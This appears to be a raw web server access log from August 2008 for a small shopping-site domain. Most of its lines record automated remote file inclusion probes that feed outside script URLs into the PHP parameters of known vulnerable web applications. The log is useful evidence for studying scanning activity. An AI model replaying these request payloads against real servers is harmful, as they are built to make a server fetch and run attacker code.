67.15.80.42 - - [26/Aug/2008:23:01:17 -0700] "GET /logs/access_080807.log//appserv/main.php?appserv_root=http://ecology99.freehostia.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
208.75.225.10 - - [26/Aug/2008:23:01:40 -0700] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://acc-advertising.com/img/idnya.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
64.185.237.191 - - [26/Aug/2008:23:02:31 -0700] "GET //errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "oldfactorymall.com"
64.185.237.191 - - [26/Aug/2008:23:02:31 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "oldfactorymall.com"
64.185.237.191 - - [26/Aug/2008:23:02:31 -0700] "GET //errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "oldfactorymall.com"
64.185.237.191 - - [26/Aug/2008:23:02:31 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "oldfactorymall.com"
64.185.237.191 - - [26/Aug/2008:23:02:37 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.oldfactorymall.com"
64.185.237.191 - - [26/Aug/2008:23:02:37 -0700] "GET //errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.oldfactorymall.com"
64.185.237.191 - - [26/Aug/2008:23:02:37 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.oldfactorymall.com"
64.185.237.191 - - [26/Aug/2008:23:02:37 -0700] "GET //errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.oldfactorymall.com"
209.52.173.110 - - [26/Aug/2008:23:02:43 -0700] "GET //errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.oldfactorymall.com"
209.52.173.110 - - [26/Aug/2008:23:02:43 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.oldfactorymall.com"
209.52.173.110 - - [26/Aug/2008:23:02:43 -0700] "GET //errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.oldfactorymall.com"
209.52.173.110 - - [26/Aug/2008:23:02:43 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.oldfactorymall.com"
72.1.16.230 - - [26/Aug/2008:23:02:49 -0700] "GET //errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "oldfactorymall.com"
72.1.16.230 - - [26/Aug/2008:23:02:49 -0700] "GET //errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "oldfactorymall.com"
72.1.16.230 - - [26/Aug/2008:23:02:51 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "oldfactorymall.com"
72.1.16.230 - - [26/Aug/2008:23:02:52 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "oldfactorymall.com"
85.214.88.11 - - [26/Aug/2008:23:02:56 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "oldfactorymall.com"
85.214.88.11 - - [26/Aug/2008:23:02:56 -0700] "GET //errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "oldfactorymall.com"
85.214.88.11 - - [26/Aug/2008:23:02:56 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "oldfactorymall.com"
85.214.88.11 - - [26/Aug/2008:23:02:56 -0700] "GET //errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "oldfactorymall.com"
72.1.16.230 - - [26/Aug/2008:23:03:05 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.oldfactorymall.com"
72.1.16.230 - - [26/Aug/2008:23:03:06 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.oldfactorymall.com"
72.1.16.230 - - [26/Aug/2008:23:03:12 -0700] "GET //errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.oldfactorymall.com"
72.1.16.230 - - [26/Aug/2008:23:03:12 -0700] "GET //errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.oldfactorymall.com"
70.86.15.18 - - [26/Aug/2008:23:04:32 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "oldfactorymall.com"
70.86.15.18 - - [26/Aug/2008:23:04:38 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "oldfactorymall.com"
209.52.173.110 - - [26/Aug/2008:23:07:45 -0700] "GET //errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "oldfactorymall.com"
209.52.173.110 - - [26/Aug/2008:23:07:45 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "oldfactorymall.com"
209.52.173.110 - - [26/Aug/2008:23:07:45 -0700] "GET //errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "oldfactorymall.com"
209.52.173.110 - - [26/Aug/2008:23:07:45 -0700] "GET /logs//errors.php?error=http://triangle-uiuc.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "oldfactorymall.com"
89.111.184.180 - - [26/Aug/2008:23:11:17 -0700] "GET /logs/access_080810.log//include/lib.inc.php?site_path=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
89.111.184.180 - - [26/Aug/2008:23:11:17 -0700] "GET //include/lib.inc.php?site_path=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
89.111.184.180 - - [26/Aug/2008:23:11:17 -0700] "GET /logs//include/lib.inc.php?site_path=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
70.86.15.18 - - [26/Aug/2008:23:11:30 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.oldfactorymall.com"
70.86.15.18 - - [26/Aug/2008:23:11:31 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.oldfactorymall.com"
65.18.170.161 - - [26/Aug/2008:23:11:38 -0700] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.18.170.161 - - [26/Aug/2008:23:11:38 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.18.170.161 - - [26/Aug/2008:23:11:38 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.38.169.228 - - [26/Aug/2008:23:11:50 -0700] "GET /logs/netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.38.169.228 - - [26/Aug/2008:23:11:50 -0700] "GET /netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.18.170.161 - - [26/Aug/2008:23:12:10 -0700] "GET /logs/access_080810.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
81.29.112.219 - - [26/Aug/2008:23:14:14 -0700] "GET /logs//?path%5Bdocroot%5D=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.0" 200 4931 "-" "libwww-perl/5.48" "www.oldfactorymall.com"
81.29.112.219 - - [26/Aug/2008:23:14:14 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.oldfactorymall.com"
81.29.112.219 - - [26/Aug/2008:23:14:14 -0700] "GET //?path%5Bdocroot%5D=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.0" 200 763 "-" "libwww-perl/5.48" "www.oldfactorymall.com"
89.111.184.180 - - [26/Aug/2008:23:14:46 -0700] "GET //include/lib.inc.php?site_path=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "oldfactorymall.com"
89.111.184.180 - - [26/Aug/2008:23:14:46 -0700] "GET /logs//include/lib.inc.php?site_path=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "oldfactorymall.com"
89.111.184.180 - - [26/Aug/2008:23:14:47 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "oldfactorymall.com"
70.86.15.18 - - [26/Aug/2008:23:15:41 -0700] "GET //functions.inc.php?config[ppa_root_path]=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.oldfactorymall.com"
208.75.225.10 - - [26/Aug/2008:23:15:42 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://acc-advertising.com/img/idnya.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
208.75.225.10 - - [26/Aug/2008:23:15:42 -0700] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://acc-advertising.com/img/idnya.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
208.75.225.10 - - [26/Aug/2008:23:15:42 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://acc-advertising.com/img/idnya.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
70.86.15.18 - - [26/Aug/2008:23:15:45 -0700] "GET /logs//functions.inc.php?config[ppa_root_path]=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.oldfactorymall.com"
83.137.192.222 - - [26/Aug/2008:23:16:30 -0700] "GET /logs/access_080627.log//?path%5Bdocroot%5D=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
83.137.192.222 - - [26/Aug/2008:23:16:30 -0700] "GET /logs/access_080627.log//?path%5Bdocroot%5D=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
83.137.192.222 - - [26/Aug/2008:23:16:31 -0700] "GET //?path%5Bdocroot%5D=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
83.137.192.222 - - [26/Aug/2008:23:16:31 -0700] "GET //?path%5Bdocroot%5D=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
83.137.192.222 - - [26/Aug/2008:23:16:31 -0700] "GET /logs//?path%5Bdocroot%5D=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
83.137.192.222 - - [26/Aug/2008:23:16:32 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
59.106.19.213 - - [26/Aug/2008:23:17:33 -0700] "GET /logs/access_080725.log/accounts/inc/include.php?language=0&lang_settings[0][1]=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
59.106.19.213 - - [26/Aug/2008:23:17:33 -0700] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
59.106.19.213 - - [26/Aug/2008:23:17:34 -0700] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
70.86.15.18 - - [26/Aug/2008:23:17:38 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.oldfactorymall.com"
70.86.15.18 - - [26/Aug/2008:23:17:39 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.oldfactorymall.com"
220.133.121.243 - - [26/Aug/2008:23:17:40 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
220.133.121.243 - - [26/Aug/2008:23:17:41 -0700] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
220.133.121.243 - - [26/Aug/2008:23:17:41 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
65.18.170.161 - - [26/Aug/2008:23:17:49 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
89.111.184.180 - - [26/Aug/2008:23:18:56 -0700] "GET /logs/access_080810.log%20//include/lib.inc.php?site_path=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
70.86.15.18 - - [26/Aug/2008:23:19:26 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aocbots.com/cms/test.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
70.86.15.18 - - [26/Aug/2008:23:19:26 -0700] "GET /logs/access_080728.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aocbots.com/cms/test.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
70.86.15.18 - - [26/Aug/2008:23:19:27 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aocbots.com/cms/test.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.38.169.228 - - [26/Aug/2008:23:19:29 -0700] "GET /netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.38.169.228 - - [26/Aug/2008:23:19:29 -0700] "GET /logs/netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
202.89.35.113 - - [26/Aug/2008:23:20:15 -0700] "GET /logs/access_080703.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
202.89.35.113 - - [26/Aug/2008:23:20:15 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
202.89.35.113 - - [26/Aug/2008:23:20:19 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
70.86.15.18 - - [26/Aug/2008:23:20:21 -0700] "GET /logs/access_080722.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aocbots.com/cms/test.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
220.133.121.243 - - [26/Aug/2008:23:20:38 -0700] "GET /logs/access_080810.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
83.137.192.222 - - [26/Aug/2008:23:20:46 -0700] "GET /logs/access_080712.log//?path%5Bdocroot%5D=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
83.137.192.222 - - [26/Aug/2008:23:20:47 -0700] "GET /logs/access_080712.log//?path%5Bdocroot%5D=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
208.75.225.10 - - [26/Aug/2008:23:20:50 -0700] "GET /logs/access_080810.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://acc-advertising.com/img/idnya.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
220.133.121.243 - - [26/Aug/2008:23:21:26 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
220.133.121.243 - - [26/Aug/2008:23:21:27 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
220.133.121.243 - - [26/Aug/2008:23:21:30 -0700] "GET /logs/access_080724.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
220.133.121.243 - - [26/Aug/2008:23:21:40 -0700] "GET /logs/access_080712.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
74.55.37.146 - - [26/Aug/2008:23:22:09 -0700] "GET /?path[docroot]=http://www.21stcenturywoman.com/new/images/echo? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
202.89.35.113 - - [26/Aug/2008:23:23:26 -0700] "GET /logs/access_080720.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
66.197.222.85 - - [26/Aug/2008:23:24:49 -0700] "GET /logs/access_080810.log/?sourcedir=http://sistemas.unilestemg.br/ping/g.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
65.38.169.228 - - [26/Aug/2008:23:25:43 -0700] "GET /logs/access_080810.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
66.197.222.85 - - [26/Aug/2008:23:26:08 -0700] "GET /logs/access_080810.log/?sourcedir=http://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.oldfactorymall.com"
204.214.80.199 - - [26/Aug/2008:23:26:18 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
204.214.80.199 - - [26/Aug/2008:23:26:21 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
204.214.80.199 - - [26/Aug/2008:23:26:21 -0700] "GET /logs/access.log//bemarket/postscript/postscript.php?p_mode=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
125.163.29.34 - - [26/Aug/2008:23:28:04 -0700] "GET /logs/access_080805.log HTTP/1.1" 200 1114112 "http://www.google.co.id/search?q=untouch.me+gmail&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/2.0.0.10;MEGAUPLOAD 1.0" "www.oldfactorymall.com"
66.249.70.77 - - [26/Aug/2008:23:31:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.oldfactorymall.com"
66.249.70.77 - - [26/Aug/2008:23:31:37 -0700] "GET /logs/access_080724.log HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.oldfactorymall.com"
74.55.37.146 - - [26/Aug/2008:23:31:46 -0700] "GET /logs/access.log/?path[docroot]=http://www.21stcenturywoman.com/new/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
74.55.37.146 - - [26/Aug/2008:23:31:46 -0700] "GET /logs/?path[docroot]=http://www.21stcenturywoman.com/new/images/echo? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
85.158.181.11 - - [26/Aug/2008:23:32:11 -0700] "GET //include/write.php?dir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
85.158.181.11 - - [26/Aug/2008:23:32:11 -0700] "GET /logs/access_080722.log//include/write.php?dir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
85.158.181.11 - - [26/Aug/2008:23:32:12 -0700] "GET /logs/access_080712.log//include/write.php?dir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
85.158.181.11 - - [26/Aug/2008:23:32:12 -0700] "GET /logs//include/write.php?dir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
207.58.167.158 - - [26/Aug/2008:23:32:41 -0700] "GET /logs/netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.oldfactorymall.com"
207.58.167.158 - - [26/Aug/2008:23:32:42 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.oldfactorymall.com"
85.158.181.11 - - [26/Aug/2008:23:32:46 -0700] "GET /logs/access_080710.log//include/write.php?dir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
218.125.168.64 - - [26/Aug/2008:23:32:50 -0700] "GET /logs/access_080728.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.oldfactorymall.com"
218.125.168.64 - - [26/Aug/2008:23:32:51 -0700] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.oldfactorymall.com"
218.125.168.64 - - [26/Aug/2008:23:32:51 -0700] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.oldfactorymall.com"
89.111.184.180 - - [26/Aug/2008:23:33:14 -0700] "GET //?path%5Bdocroot%5D=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
89.111.184.180 - - [26/Aug/2008:23:33:14 -0700] "GET /logs//?path%5Bdocroot%5D=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
89.111.184.180 - - [26/Aug/2008:23:33:14 -0700] "GET /logs/access_080810.log//?path%5Bdocroot%5D=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
